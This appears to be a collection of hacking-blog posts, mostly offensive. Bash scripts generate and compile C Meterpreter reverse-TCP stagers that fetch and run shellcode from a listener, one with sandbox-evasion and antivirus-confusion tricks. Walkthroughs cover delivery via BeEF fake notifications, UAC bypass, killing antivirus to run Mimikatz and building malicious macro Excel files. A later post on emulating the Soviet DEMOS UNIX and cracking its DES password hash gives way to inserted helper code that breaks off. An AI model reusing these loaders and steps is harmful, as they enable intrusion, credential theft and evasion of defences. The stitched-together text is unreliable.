echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo '        startb += nret;'>> temp.c
echo '        tret   += nret;'>>temp.c
echo '         if (nret == SOCKET_ERROR)'>> temp.c
echo '            punt(my_socket, "no data");'>> temp.c
echo '    }'>>temp.c
echo '    return tret;'>> temp.c
echo '}' >> temp.c  
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo '    struct hostent *        target;' >> temp.c
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c
echo '        punt(my_socket, ".");'>>temp.c
echo '    target = gethostbyname(targetip);'>>temp.c
echo '    if (target == NULL)'>>temp.c
echo '        punt(my_socket, "..");'>>temp.c
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo '    sock.sin_family = AF_INET;'>> temp.c
echo '    sock.sin_port = htons(port);'>>temp.c
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo '         punt(my_socket, "...");'>>temp.c  
echo '    return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo '  FreeConsole();'>>temp.c
echo '    ULONG32 size;'>>temp.c
echo '    char * buffer;'>>temp.c
echo '    void (*function)();'>>temp.c
echo '    winsock_init();'>> temp.c
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo '    if (count != 4 || size <= 0)'>>temp.c
echo '        punt(my_socket, "error lenght\n");'>>temp.c
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo '    if (buffer == NULL)'>>temp.c
echo '        punt(my_socket, "error in buf\n");'>>temp.c
echo '    buffer[0] = 0xBF;'>>temp.c
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo '    function = (void (*)())buffer;'>>temp.c
echo '    function();'>>temp.c
echo '    return 0;'>>temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc  temp.c -o payload.exe -lws2_32 -mwindows
rm temp.c
strip payload.exe
file=`ls -la payload.exe` ; echo '(+)' $file

My custom listener script is this:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ?  \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler;  set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh
echo -n $host >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n $port >> run.listener.sh
echo -n '; run"' >> run.listener.sh  
chmod +x run.listener.sh
./run.listener.sh

So let's get to the execution:
– Generate 2 payloads via the Custom-Payload-Generator
(payload.exe and payload.uac.exe)
– Start Custom Listeners (for payload.exe and payload.uac.exe)
– Load the payload.exe to BeEF’s /extensions/demos/html
– Execute the BeEF “Fake Notification Bar (Chrome)” module under the hooked browser
– Windows 10 makes it much more difficult to execute an unsigned binary, but it's still possible :)
– Once we get a reverse shell, try to get system… it will fail, we need UAC bypass
– Upload a second payload.uac.exe to the host
– Upload Akagi64.exe to the same location
– Migrate to Explorer.exe (you won't be able to launch a shell from the Chrome PID)
– Launch shell to get a Windows command prompt
– Execute akagi64.exe 17 c:\location\of\the\payload.uac.exe
– On the second Listener (payload.uac.exe) a shell should pop up
– Now you can run getsystem ;) in this new shell

If anything is unclear, watch the attached YouTube video.

– Stay safe ;)

Here is the video demo – enjoy


Windows 2012 R2 AD controller / Windows 10 client / Metasploit / Mimikatz


This is an experiment that I wanted to share.

But before that I wanted to introduce my collection of WTF screenshots from movies, which I have started recently.

Mission Impossible 5

Data Transfer Relay Algo Open Sourced ….

I wish hacking was as much fun as it looks in these movies …

=================================================

Software used:
Windows 2012 R2 – Domain Controller (VIRTUAL.COM) (64bit) {Latest}
Windows 10 – AD joined (WINDOWS10.VIRTUAL.COM) (64bit) {Latest}
Alpine Linux – Router (NS.VIRTUAL.COM) {4.4.11-0-grsec}
Debian Linux – Linux with Metasploit (64bit) {metasploit v4.12.24-dev-58112d7}
VirtualBox – Hypervisor from Oracle {5.1.4}
Mimikatz – Latest version from https://github.com/gentilkiwi/mimikatz/releases/latest
Custom tools to unload AV

Scenario:
– Execution of a custom meterpreter payload on a domain joined WINDOWS10.VIRTUAL.COM (64bit)
– Trying to run mimikatz from unprivileged session – no luck
– Executing the custom meterpreter payload binary with domain admin rights HYPERUSER\VIRTUAL.COM
– Get SYSTEM
– Try to execute the inbuilt meterpreter mimikatz (kiwi / mimikatz) – no luck
– Try to execute mimikatz (64bit) copy from https://github.com/gentilkiwi/mimikatz/releases/latest (Windows defender flags this) – no luck
– Upload mimikatz to host via meterpreter session
– Kill AV using Viktor Cleaner 2.0
– Execute mimikatz (64bit) copy from https://github.com/gentilkiwi/mimikatz/releases/latest
– Profit


Part 1 of the experiment

Part 2 of the experiment


John Connor vs. ESET (Hey Eset choose some other mascot, not a cyborg)


Those people that saw the old Terminator movies probably agree that today's security companies are becoming more and more like Skynet :) I like the Slovak ESET, it is great; unfortunately they have chosen a terminator as their mascot, which kind of gives me the creeps…

Imagine that in the near future mankind would have to fight its way against the machines, against some automation tools, against some semi-artificial intelligence. James Cameron showed us a glimpse of a possible future a long time ago, and we tend to create it in an even more sophisticated form.

What makes us human is that we can stop the machine, we can outsmart it. Do you like being somebody that is managed by artificial intelligence? Would this make us cyber-phobic?

Cyber-phobia … the new social disorder that could be treated with proper drugs, right?

Let's still keep a little humanity in us and practice “a skill” against the machines. What's wrong with taking down a piece of software? It has no kids and no future (unless it forks and time-warps).

The motto of the day is:

“You’re either on the bus or off the bus.”

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Stolen from meterpreterjank "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port
echo '#include <stdio.h>' > temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo 'void winsock_init();' >> temp.c
echo 'void Kick(SOCKET my_socket, char * error);' >> temp.c
echo 'void genlol();' >> temp.c
echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port);' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max);' >> temp.c
echo 'char* rev(char* str);' >> temp.c
echo 'int sandbox_evasion();' >> temp.c
echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);' >> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("ws2_32.dll is out of date.\n");' >> temp.c
echo ' WSACleanup();' >> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'void Kick(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("error: %s\n", error);' >> temp.c
echo ' closesocket(my_socket);' >> temp.c
echo ' WSACleanup();' >> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo 'void genlol(){' >> temp.c
echo ' int num1, num2, num3;' >> temp.c
echo ' num1=100;' >> temp.c
echo ' while (num1<=5) {' >> temp.c
echo ' num1=random_in_range(0,10000);' >> temp.c
echo ' num2=random_in_range(0,10000);' >> temp.c
echo ' num3=random_in_range(0,10000);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;' >> temp.c
echo ' int nret = 0;' >> temp.c
echo ' void * startb = buffer;' >> temp.c
echo ' while (tret < len) {' >> temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> temp.c
echo ' startb += nret;' >> temp.c
echo ' tret += nret;' >> temp.c
echo ' if (nret == SOCKET_ERROR)' >> temp.c
echo ' Kick(my_socket, "Could not receive data");' >> temp.c
echo ' }' >> temp.c
echo ' return tret;' >> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {' >> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;' >> temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> temp.c
echo ' if (my_socket == INVALID_SOCKET)' >> temp.c
echo ' Kick(my_socket, "Cannot initialize socket");' >> temp.c
echo ' target = gethostbyname(targetip);' >> temp.c
echo ' if (target == NULL)' >> temp.c
echo ' Kick(my_socket, "cannot resolve target");' >> temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> temp.c
echo ' sock.sin_family = AF_INET;' >> temp.c
echo ' sock.sin_port = htons(port);' >> temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> temp.c
echo ' Kick(my_socket, "Could not connect");' >> temp.c
echo ' return my_socket;' >> temp.c
echo '}' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max)' >> temp.c
echo '{' >> temp.c
echo ' int base_random = rand(); ' >> temp.c
echo ' if (RAND_MAX == base_random){' >> temp.c
echo ' return random_in_range(min, max);' >> temp.c
echo ' }' >> temp.c
echo ' int range = max - min,' >> temp.c
echo ' remainder = RAND_MAX % range,' >> temp.c
echo ' bucket = RAND_MAX / range;' >> temp.c
echo ' if (base_random < RAND_MAX - remainder) {' >> temp.c
echo ' return min + base_random/bucket;' >> temp.c
echo ' } else {' >> temp.c
echo ' return random_in_range (min, max);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'char* rev(char* str)' >> temp.c
echo '{' >> temp.c
echo ' int end=strlen(str)-1;' >> temp.c
echo ' int i;' >> temp.c
echo ' for(i=5; i<end; i++)' >> temp.c
echo ' {' >> temp.c
echo ' str[i] ^= 1;' >> temp.c
echo ' }' >> temp.c
echo ' return str;' >> temp.c
echo '}' >> temp.c
echo 'int sandbox_evasion(){' >> temp.c
echo ' MSG msg;' >> temp.c
echo ' DWORD tc;' >> temp.c
echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> temp.c
echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> temp.c
echo ' return -1;' >> temp.c
echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> temp.c
echo ' return -1;' >> temp.c
echo ' tc = GetTickCount();' >> temp.c
echo ' Sleep(650);' >> temp.c
echo ' if (((GetTickCount() - tc) / 300) != 2)' >> temp.c
echo ' return -1;' >> temp.c
echo ' return 0;' >> temp.c
echo '}' >> temp.c
echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> temp.c
echo ' ULONG32 size;' >> temp.c
echo ' char * buffer;' >> temp.c
echo ' void (*function)();' >> temp.c
echo ' winsock_init();' >> temp.c
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> temp.c
echo ' if (count != 4 || size <= 0)' >> temp.c
echo ' Kick(my_socket, "bad length value\n");' >> temp.c
echo ' genlol();' >> temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> temp.c
echo ' genlol();' >> temp.c
echo ' if (buffer == NULL)' >> temp.c
echo ' Kick(my_socket, "bad buffer\n");' >> temp.c
echo ' buffer[0] = 0xBF;' >> temp.c
echo ' genlol();' >> temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);' >> temp.c
echo ' genlol();' >> temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);' >> temp.c
echo ' function = (void (*)())buffer;' >> temp.c
echo ' function();' >> temp.c
echo '}' >> temp.c
echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> temp.c
echo ' ULONG32 size;' >> temp.c
echo ' char * buffer;' >> temp.c
echo ' void (*function)();' >> temp.c
echo ' winsock_init();' >> temp.c
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> temp.c
echo ' if (count != 4 || size <= 0)' >> temp.c
echo ' Kick(my_socket, "bad length value\n");' >> temp.c
echo ' genlol();' >> temp.c
echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> temp.c
echo ' genlol();' >> temp.c
echo ' if (buffer == NULL)' >> temp.c
echo ' Kick(my_socket, "bad buffer\n");' >> temp.c
echo ' buffer[0] = 0x48;' >> temp.c
echo ' buffer[1] = 0xBF;' >> temp.c
echo ' genlol();' >> temp.c
echo ' memcpy(buffer + 2, &my_socket, 8);' >> temp.c
echo ' genlol();' >> temp.c
echo ' count = recv_all(my_socket, buffer + 10, size);' >> temp.c
echo ' function = (void (*)())buffer;' >> temp.c
echo ' function();' >> temp.c
echo '}' >> temp.c
echo 'int main(int argc, char *argv[]) {' >> temp.c
echo -n 'char * defaultListenerIP = "' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned int defaultListenerPort = ' >> temp.c
echo -n $port >> temp.c
echo -n ';' >> temp.c
echo '' >> temp.c
echo ' sandbox_evasion();' >> temp.c
echo ' if(argc == 3){' >> temp.c
echo ' #ifdef ISX64' >> temp.c
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> temp.c
echo ' #else' >> temp.c
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> temp.c
echo ' #endif' >> temp.c
echo ' }else{' >> temp.c
echo ' #ifdef ISX64' >> temp.c
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> temp.c
echo ' #else' >> temp.c
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> temp.c
echo ' #endif' >> temp.c
echo ' }' >> temp.c
echo ' return 0;' >> temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc temp.c -o file.exe -lws2_32 -mwindows
file=`ls -la file.exe` ; echo '(+)' $file

The bypass is something that took me 15 minutes to google out. I must say that the spoofing code is great and I love it. ESET Terminator gets majorly confused by this.

So once we bypass the heuristics and sigs, we strike with a final blow via John Connor :)

How much more symbolic can it get? :)

Here is a YouTube demonstration of the above thoughts..

You don’t lead by pointing and telling people some place to go. You lead by going to that place and making a case.


LuckyStrike and custom Metasploit loader


Lucky Strike is awesome.  So I wanted to share my findings from experiments I have made.

LUCKY STRIKE, GIRL IN RED

TL;DR – LuckyStrike is an Excel file generator that creates an Excel file with a custom executable payload embedded via a macro. It has other features as well, but I was only interested in the custom EXE file insertion.

The GitHub repository for LuckyStrike is here: https://github.com/Shellntel/luckystrike

Greetings to curi0usJack

Software I have used:

So first we need to prepare the LuckyStrike environment. On Windows 10 (64-bit) you need to enable the following for the PowerShell environment:

(Run Windows PowerShell ISE with admin privileges and set the execution policy; execute it from the directory where you expect to have the LuckyStrike directory.)

Set-ExecutionPolicy RemoteSigned

Next we install LuckyStrike as suggested by the author:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

Accept all options and allow the PSSQLite module installation.

We are ready to start LuckyStrike. Go to the directory where LuckyStrike is and execute the PowerShell script:

./luckystrike.ps1

Next we need to create a payload template to use in our poisoned Excel documents.

Next we add a new payload to the catalogue.

Add the generated EXE from https://astr0baby.wordpress.com/2016/09/23/john-connor-vs-eset-hey-eset-choose-some-other-mascot-not-a-cyborg/

Make sure you type the C: drive letter in UPPER case; lower case for some reason always failed :)

Select the new payload template to be used for the Excel file and choose the infection method, “Save To Disk”.

Now generate the Excel file with the selected custom payload.

The poisoned Excel file is ready in the luckystrike\payloads directory.

Execute it and enjoy the shell ;)

Attached is the video recording of the above




Soviet UNIX clone – DEMOS


This is something that I think should be shared exactly now, as the anti-Russian craziness peaks once again. When the Cold War between the USA and the USSR reached its climax in the early 1980s, the technological advantage was on the Western side. Interestingly enough, the Soviet side wanted to keep up and by various means managed to build its own 16-bit microprocessors.


The Soviets had their 1801 series CPU, which was compatible with DEC’s PDP-11. It was first released in 1980, and this CPU offered a first glimpse into the UNIX world.

https://en.wikipedia.org/wiki/DVK

The first ever Soviet UNIX was called MNOS. Its development was initiated at the IPK Minavtoproma in Moscow in 1981, and development continued in cooperation with other institutes, including the Kurchatov Institute.
In 1982 DEMOS development was initiated at the Kurchatov Institute of Atomic Energy in Moscow. The Kurchatov Institute was founded in 1943 with the initial purpose of developing nuclear weapons.

DEMOS stands for “Dialogovaya Edinaya Mobilnaya Operatsionnaya Sistema” (Диалоговая Единая Мобильная Операционная Система, ДЕМОС), i.e. Interactive Unified Portable Operating System.

So as modern archaeologists, let’s get our hands on some DEMOS!

Get the DEMOS 3.0 images here: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/vak-opensource/dvk-demos.zip
The zip archive is actually hosted by Sergei Vakulenko, one of the programmers of DEMOS.

The dvk-demos.zip archive contains the following files:

-rw-r--r-- 1 user user 35 Apr 20 2011 demos.bat
-rw-r--r-- 1 user user 97 Apr 20 2011 demos.ini
-rwxr-xr-x 1 user user 32 Apr 20 2011 demos.sh
-rw-r--r-- 1 user user 20003840 Apr 20 2011 harddisk.img
-rwxr-xr-x 1 user user 414552 Apr 20 2011 pdp11
-rwxr-xr-x 1 user user 416768 Apr 20 2011 pdp11.exe
-rw-r--r-- 1 user user 323 Apr 20 2011 README.txt

We can safely delete the demos.bat and pdp11.exe files, as the following instructions are for Debian-based Linux.

The pdp11 binary is quite old and I would suggest downloading the newer 4.0 beta release, which contains the nice TELNET option to connect to the simh console via telnet.

Get simh 4.0 beta from here (with the dvk-pdp11 patch): https://github.com/shattered/simh/tree/simh-dvk

git clone -b simh-dvk https://github.com/shattered/simh.git
cd simh
make pdp11
cp BIN/pdp11 /to/the-extracted-demos-3.0/dir

Now the new pdp11 binary needs some modification of the original demos.ini:

set LPT disable
set DZ disable
set cpu 11/23 256k cis idle
attach kmd0 floppy.img
attach kgd0 harddisk.img
set console telnet=4000
boot kgd0

The above config runs pdp11 listening on TCP port 4000, which can be accessed with your favourite telnet client; I have chosen PuTTY.

# apt-get install putty

Now execute PuTTY and point it to localhost port 4000 via the telnet protocol.

Run demos.sh (which executes ./pdp11 -i demos.ini):

./demos.sh
PDP-11 simulator V4.0-0 Beta git commit id: 1b97ab17
Listening on port 4000
Waiting for console Telnet connection

Connect with PuTTY.

Hit ENTER to boot the pdp11 and hit ENTER at all other prompts (time configuration: hey, this is not Y2K ready, so we will go back to 1991).

Log in as root (no password set; just hit ENTER).

So now we are finally running DEMOS 3.0. What next?

# How to copy files from the host to dvk-pdp11 DEMOS

– On the host simply do:

 $ tar cf floppy.img somefile.c

– Attach floppy.img in demos.ini:

attach kmd0 floppy.img

– Once DEMOS is booted do:

SUPER>  tar xf /dev/fd0

# How to copy files from dvk-pdp11 to the host?
For some reason GNU tar does not like tarballs made on DEMOS.
I could not get the following to work:

– On dvk-pdp11:

 SUPER > tar cf /dev/fd0 /usr/bin/somefile

(this works)
– On the host:

$ tar xvf floppy.img
tar: Removing leading `/' from member names
/usr/bin/somefile
tar: A lone zero block at 42

GNU tar has problems with the dvk-pdp11 DEMOS tarballs. So I decided to upload an ancient uuencode.c to the host via the floppy.img method.
In our example we will upload uuencode.c and compile it:

/*
 * Copyright (c) 1983 Regents of the University of California.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms are permitted
 * provided that the above copyright notice and this paragraph are
 * duplicated in all such forms and that any documentation,
 * advertising materials, and other materials related to such
 * distribution and use acknowledge that the software was developed
 * by the University of California, Berkeley.  The name of the
 * University may not be used to endorse or promote products derived
 * from this software without specific prior written permission.
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
 * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
 */

/*
 * Modified 12 April 1990 by Mark Adler for use on MSDOS systems with
 * Microsoft C and Turbo C.  Standard input problem fixed 29 April 1990
 * as per suggestion by Steve Harrold.
 *
 * Modifed 13 February 1991 by Greg Roelofs for use on VMS systems.
 * Compile and link normally (but note that the shared-image link option
 * produces a binary only 6 blocks long, as opposed to the 152-block one
 * produced by an ordinary link).  To set up the VMS symbol to run the
 * program ("run uuencode filename1 filename2 filename3" won't work), do:
 *        uuencode :== "$disk:[directory]uuencode.exe"
 * and don't forget the leading "$" or it still won't work.  The syntax
 * differs slightly from the Unix and MS-DOS versions since VMS has such
 * an awkward approach to redirection; run the program with no arguments
 * for the usage (or see USAGE below).  The output file is in VMS "stream-
 * LF" format but should be readable by MAIL, ftp, or anything else.
 */

#ifndef lint
static char sccsid[] = "@(#)uuencode.c    5.6 (Berkeley) 7/6/88";
#endif /* not lint */

#ifdef __MSDOS__        /* For Turbo C */
#define MSDOS 1
#endif

/*
 * uuencode [input] output
 *
 * Encode a file so it can be mailed to a remote system.
 */
#include <stdio.h>

#ifdef VMS
#  define OUT out    /* force user to specify output file */
#  define NUM_ARGS 3
#  define USAGE "Usage: uuencode [infile] remotefile uufile\n"
#  include <types.h>
#  include <stat.h>
#else
#  define OUT stdout    /* Unix, MS-DOS:  anybody with decent redirection */
#  define NUM_ARGS 2
#  define USAGE "Usage: uuencode [infile] remotefile\n"
#  include <sys/types.h>
#  include <sys/stat.h>
#endif

#if MSDOS
#include <io.h>
#include <fcntl.h>
#endif

/* ENC is the basic 1-character encoding function to make a char printing */
#define ENC(c) ((c) ? ((c) & 077) + ' ': '`')

main(argc, argv)
char **argv;
{
#ifdef VMS
    FILE *out;
#endif
    FILE *in;
    struct stat sbuf;
    int mode;

    /* optional 1st argument */
    if (argc > NUM_ARGS) {
        if ((in = fopen(argv[1], "r")) == NULL) {
            perror(argv[1]);
            exit(1);
        }
        argv++; argc--;
    } else
        in = stdin;

#if MSDOS
    /* set input file mode to binary for MSDOS systems */
    setmode(fileno(in), O_BINARY);
#endif

    if (argc != NUM_ARGS) {
        fprintf(stderr, USAGE);
        exit(2);
    }

#ifdef VMS   /* mandatory 3rd argument is name of uuencoded file */
    if ((out = fopen(argv[2], "w")) == NULL) {
        perror(argv[2]);
        exit(4);
    }
#endif

    /* figure out the input file mode */
    if (fstat(fileno(in), &sbuf) < 0 || !isatty(fileno(in)))
        mode = 0666 & ~umask(0666);
    else
        mode = sbuf.st_mode & 0777;
    fprintf(OUT, "begin %o %s\n", mode, argv[1]);

    encode(in, OUT);

    fprintf(OUT, "end\n");
    exit(0);
}

/*
 * copy from in to out, encoding as you go along.
 */
encode(in, out)
register FILE *in;
register FILE *out;
{
    char buf[80];
    register int i, n;

    for (;;) {
        /* 1 (up to) 45 character line */
        n = fread(buf, 1, 45, in);
        putc(ENC(n), out);

        for (i=0; i<n; i += 3)
            outdec(&buf[i], out);

        putc('\n', out);
        if (n <= 0)
            break;
    }
}

/*
 * output one group of 3 bytes, pointed at by p, on file f.
 */
outdec(p, f)
register char *p;
register FILE *f;
{
    register int c1, c2, c3, c4;

    c1 = *p >> 2;
    c2 = (*p << 4) & 060 | (p[1] >> 4) & 017;
    c3 = (p[1] << 2) & 074 | (p[2] >> 6) & 03;
    c4 = p[2] & 077;
    putc(ENC(c1), f);
    putc(ENC(c2), f);
    putc(ENC(c3), f);
    putc(ENC(c4), f);
}

Save the above as uuencode.c and tar it to floppy.img so we can transfer it to the dvk-pdp11:

 tar cf floppy.img uuencode.c

On the dvk-pdp11 DEMOS:

SUPER > cd <some directory where you want to extract uuencode.c from the floppy>
SUPER > tar xf /dev/fd0
SUPER > cc uuencode.c -o uuencode

Now we are ready to uuencode binary files :)

SUPER > ./uuencode /path/to/binary binaryname

Copy the text output from the Telnet console.
Paste the text output on the host and save it as file.txt.

On Debian you need sharutils:

# apt-get install sharutils
$ uudecode file.txt

You should now have the binary file in the current directory:

$ file binaryname
binaryname: PDP-11 executable
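The encoder above and the uudecode step it feeds, as an added Python example that is not part of the post: it reproduces uuencode.c's ENC() mapping (including the backtick for zero) and its decoder re-pads lines whose trailing spaces a terminal copy-paste has stripped, which is the usual way a console transfer of uuencoded text breaks. The names uuencode, uudecode, enc and dec are mine.

```python
"""uuencode/uudecode compatible with the BSD uuencode.c shown above.

Added example, not the post's own code. The classic encoder emitted a
space for a zero 6-bit value, so lines could end in spaces that a
terminal copy-paste silently drops; the BSD version above uses '`'
instead. The decoder here accepts both and re-pads short lines.
"""


def enc(c: int) -> str:
    # Same as ENC(c) in uuencode.c: 6-bit value + ' ', but zero becomes '`'
    # so no output line ever ends in a space.
    return chr((c & 0o77) + ord(" ")) if c else "`"


def dec(ch: str) -> int:
    # Inverse of enc(): both '`' and ' ' map to 0.
    return (ord(ch) - ord(" ")) & 0o77


def uuencode(data: bytes, name: str, mode: int = 0o644) -> str:
    """Produce 'begin <mode> <name>' ... '`' ... 'end', 45 input bytes per line."""
    lines = [f"begin {mode:o} {name}"]
    for off in range(0, len(data), 45):
        chunk = data[off:off + 45]
        out = [enc(len(chunk))]            # length character, as in encode()
        # The C code encodes whatever stale bytes follow a short read;
        # the decoder ignores them via the length char, so zeros are fine.
        padded = chunk + b"\0" * (-len(chunk) % 3)
        for i in range(0, len(padded), 3):
            p0, p1, p2 = padded[i], padded[i + 1], padded[i + 2]
            out.append(enc(p0 >> 2))                                # outdec() c1
            out.append(enc(((p0 << 4) & 0o60) | ((p1 >> 4) & 0o17)))  # c2
            out.append(enc(((p1 << 2) & 0o74) | ((p2 >> 6) & 0o3)))   # c3
            out.append(enc(p2 & 0o77))                              # c4
        lines.append("".join(out))
    lines.append("`")                       # zero-length line: enc(0)
    lines.append("end")
    return "\n".join(lines) + "\n"


def uudecode(text: str) -> tuple[str, int, bytes]:
    """Return (name, mode, data). Tolerates lines shortened by stripped spaces."""
    it = iter(text.splitlines())
    for line in it:
        if line.startswith("begin "):
            _, mode_s, name = line.split(" ", 2)
            break
    else:
        raise ValueError("no 'begin' line found")
    mode = int(mode_s, 8)
    out = bytearray()
    for line in it:
        if line == "end":
            break
        if not line:
            continue                        # blank line from a sloppy paste
        n = dec(line[0])
        if n == 0:
            continue                        # the terminating '`' line
        needed = (n + 2) // 3 * 4           # 4 chars per 3 input bytes
        # A space encodes 0 in the classic encoder, so re-pad with spaces
        # whatever the terminal stripped from the end of the line.
        body = line[1:].ljust(needed, " ")
        decoded = bytearray()
        for i in range(0, needed, 4):
            c1, c2, c3, c4 = (dec(ch) for ch in body[i:i + 4])
            decoded.append(((c1 << 2) | (c2 >> 4)) & 0xFF)
            decoded.append(((c2 << 4) | (c3 >> 2)) & 0xFF)
            decoded.append(((c3 << 6) | c4) & 0xFF)
        out += decoded[:n]                  # drop the padding bytes
    return name, mode, bytes(out)


if __name__ == "__main__":
    # Constructed sample: "Cat" is the textbook uuencode example.
    text = uuencode(b"Cat", "cat.txt")
    print(text, end="")
    print(uudecode(text))
```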

Now let’s check what password hashing cipher the Soviets used back then. Set your root password via the passwd command.

SUPER 74> cat /etc/passwd
 root:vQwdXj/6D.J2M:0:2:Суперпользователь (The God):/:/bin/csh
 daemon:***:1:1:Дьявол во плоти:/:
 sys:***:2:2::/:
 bin:***:3:2::/:
 uucp::4:1:Сеть UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico
 notes:***:5:1:Создатель Notesfiles:/usr/spool/notes:
 anon:***:6:1:Анонимный пользователь Notesfiles:/usr/spool/notes:
 news:***:7:1:Создатель новостей:/usr/spool/news:
 bugs:***:8:1:Адресат для сообщений об ошибках:/usr/spool/mail:/usr/bin/mail
 rubin:***:100:2:суперпользователь СУБД РУБИН:/usr/rubin:/bin/csh
 user::101:1:Пользователь:/usr/user:/usr/bin/vs

  • Copy-paste the above passwd file and save it on the host as dvk-pdp11-passwd
  • Install John the Ripper:
# apt-get install john
  • Create a wordlist file with the password we have set in dvk-pdp11 DEMOS
    and add multiple variations of the password to verify the cipher on DEMOS:
$ john --wordlist=wordlist dvk-pdp11-passwd
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
p4ssw0rd         (root)
1g 0:00:00:00 100% 5.263g/s 78.94p/s 78.94c/s 78.94C/s passw0rd..p4ssw0rd
Use the "--show" option to display all of the cracked passwords reliably
Session completed

It works, we have cracked a Soviet DEMOS root password :)
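Before reaching for a cracker, a defender would audit the passwd file itself. This added Python example (not the post's own code) walks the DEMOS listing from above and flags empty password fields, 13-character traditional DES crypt(3) hashes and locked placeholder entries; the sample text is the listing copied from the post, and the function names are mine.

```python
"""Audit an /etc/passwd in the classic 7-field layout, as found on DEMOS 3.0.

Added example, not the post's own code. What a defender wants to know
before anyone runs john over the file:
 * empty password field -> the account logs in with no password at all
 * 13-char hash         -> traditional DES crypt(3): 2-char salt, password
                           truncated to 8 chars, trivially fast to crack
 * '***' or other junk  -> not a valid hash, so the account is locked
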